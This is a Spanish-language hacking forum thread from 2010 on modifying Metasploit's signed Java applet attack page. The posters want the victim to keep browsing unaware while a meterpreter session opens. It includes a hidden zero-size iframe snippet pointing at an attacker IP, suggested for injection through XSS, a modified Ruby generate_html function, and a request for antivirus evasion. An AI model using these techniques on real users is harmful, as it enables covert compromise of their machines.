Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: darko666 en 29 Marzo 2010, 00:47 am



Título: Redireccionar JavaApplet
Publicado por: darko666 en 29 Marzo 2010, 00:47 am
Resulta que estoy haciendo pruebas de pentesting centrandome en la intrusion con JavaApplet a traves de HTML,  y la que mejor me funciona es la que trae la ultima version de metasploit. Y el problema reside en que metasploit te genera un index.html y me gustaria poder modificar este html para poder redireccionar la salida a una web real para que asi la victima pueda seguir navegando.
Es posible o es una ilusion???


Título: Re: Redireccionar JavaApplet
Publicado por: Shell Root en 29 Marzo 2010, 03:23 am
Podes usar los filtros de Ettercap, aumentando dentro del source de las paginas webs, la apertura de la pagina infectada con el exploit, configurando con parametros para que el usuario no vea y siempre este por debajo de la pagina real.

Me habia retirado un poco del Metasploit, pero ahora estoy devuelta, asi que alguna duda estamos aquì. Creo que tengo un ejemplo de como usar lo que te digo, pero voy a dejar que pienses un poco.

Saludos!


Título: Re: Redireccionar JavaApplet
Publicado por: MagnoBalt en 29 Marzo 2010, 07:32 am
Hola darko666 , lo que puedes hacer es colocar un iframe invisible, en alguna pagina exploptando XSS por ejemplo.!!


Título: Re: Redireccionar JavaApplet
Publicado por: Shell Root en 29 Marzo 2010, 07:58 am
Hola darko666 , lo que puedes hacer es colocar un iframe invisible, en alguna pagina exploptando XSS por ejemplo.!!
WTF!...

Es depende del Exploit que vayas a usar, es decir, algunos provocan un consume de memoria, BoF, etc. Asì que si quieres que el usuario pase desapercibido. Como os dije al inicio, debes de realizar un filtro con ettercap, donde realizes un replace a alguna etiqueda y le añades un valor como una PopUp que, quede por debajo de la ventana que el usuario tenga abierta.

Si lo haces con el Iframe que dice MagnoBalt, igualmanera el usuario se và a dar cuenta, ya que la ventana queda frizeada XD. O bueno, eso supongo...  :silbar:


Título: Re: Redireccionar JavaApplet
Publicado por: MagnoBalt en 29 Marzo 2010, 18:11 pm
Citar
Hola darko666 , lo que puedes hacer es colocar un iframe invisible, en alguna pagina exploptando XSS por ejemplo.!!
WTF!...

?????????.. en que momento darko666 hablo  de algun BOF!!! no se si lo leiste bien Alex@ShellRoot, o solo peudes hacer copy and paste.!!
El esta realizando con JavaApplet, tranquilamente puedes colocar un iframe oculto, en alguna web que tengas acceso o algun XSS.. de la forma.. Supongamos que nuestro java se esta ejecutando en una http://IP-PUBLICA con el metasploit, entonces quedaria asi:

Código
  1. <iframe src="http://IP-PUBLICA "frameborder=0 width=0 height=0></iframe>

Saludos


Título: Re: Redireccionar JavaApplet
Publicado por: Shell Root en 31 Marzo 2010, 19:09 pm
dantemc :-* ...

Pero la ejecuciòn del Exploit no es de un BoF, asì que no quedarà frizzeada. Èl solo quiere cambiarle el source al archivo generado por el MSF!. Como os dije, intentad con el parametro ContextInformationFile. Esperemos a ver que nos dice el usuario.


Título: Re: Redireccionar JavaApplet
Publicado por: darko666 en 1 Abril 2010, 12:18 pm
En principio solo queria modificar el fichero index.html que te genera el metasploit, aunque cualquier método alternativo de ataque siempre es bienvenido.
Por cierto, ya lo tengo solucionado. Lo que hice fue editar el fichero java_signed_applet.rb, buscar el sitio donde se genera el html y añadirle un iframe con la dirección www que me interese. De momento parece que funcione a nivel de LAN y WAN con máquinas virtuales


Título: Re: Redireccionar JavaApplet
Publicado por: Shell Root en 1 Abril 2010, 19:51 pm
Modificar el fichero java_signed_applet.rb, xD. En que parte lo hicistes?


Título: Re: Redireccionar JavaApplet
Publicado por: darko666 en 1 Abril 2010, 22:11 pm
Vas al final del archivo y allí es donde te encuentras las sentencias en ruby para crear el fichero html.
Le añades una sentencia similar a:
html += "<iframe frameborder='0' width='900' height='1000' src='http://www.google.es'></iframe>"

Y cuando abres el metasploit y lo ejecutas, te genera el index.html esperando en el puerto que le hayas indicado.
El resultado es que cuando la víctima abre la página, le sale la ventanita del java applet a la vez que se va cargando el link del iframe. Lo he probado sobre un xp sp3 (sin antivirus) con la ultima version de explorer, firefox y safari y en los 3 el metasplot me ha devuelto el deseado meterpreter. El único problema, és que con un buen antivirus no funciona, porque detecta que alguien se intenta conectar a la máquina. No se si hay alguna forma de que la infección por java pueda ser totalmente indetectable por los antivirus.


Título: Re: Redireccionar JavaApplet
Publicado por: Shell Root en 1 Abril 2010, 22:15 pm
Vas al final del archivo y allí es donde te encuentras las sentencias en ruby para crear el fichero html.
Es completamente obvio.  :¬¬ . Podrias decirme de desde y hasta que linea modificaste, quiero ver algo...  :silbar:


Título: Re: Redireccionar JavaApplet
Publicado por: darko666 en 1 Abril 2010, 22:32 pm
de la 450 a la 459.
Aquí te pongo las ultimas 15 lineas del fichero

def generate_html( data, host, port )
      html  = "<html><head><title>Loading...</title></head>"
      html += "<body>"
      html += "<applet archive=\"#{datastore['APPLETNAME']}.jar\" "
      html += "code=\"#{datastore['APPLETNAME']}.class\" width=\"1\" height=\"1\">"
      html += "<param name=\"data\" value=\"#{data}\"/>" if data
      html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
      html += "<param name=\"lport\" value=\"#{port}\"/>" if port
      html += "</applet>"
      html += "<iframe frameborder='0' width='900' height='1000' src='http://www.google.es'></iframe>"
      html += "</body></html>"      
   return html
   end
end

Hay alguna forma de no hacer saltar el antivirus?


Título: Re: Redireccionar JavaApplet
Publicado por: Shell Root en 1 Abril 2010, 22:38 pm
Interesting...

PD: Search Encoders for exploit's. But is independent of each exploit.


Título: Re: Redireccionar JavaApplet
Publicado por: darko666 en 1 Abril 2010, 22:46 pm
Interesante, eh?
pero este modulo de metasploit me parece que no se le puede poner ningun encoder.

No se, ya me diras si a tí te saltan o no los antivirus.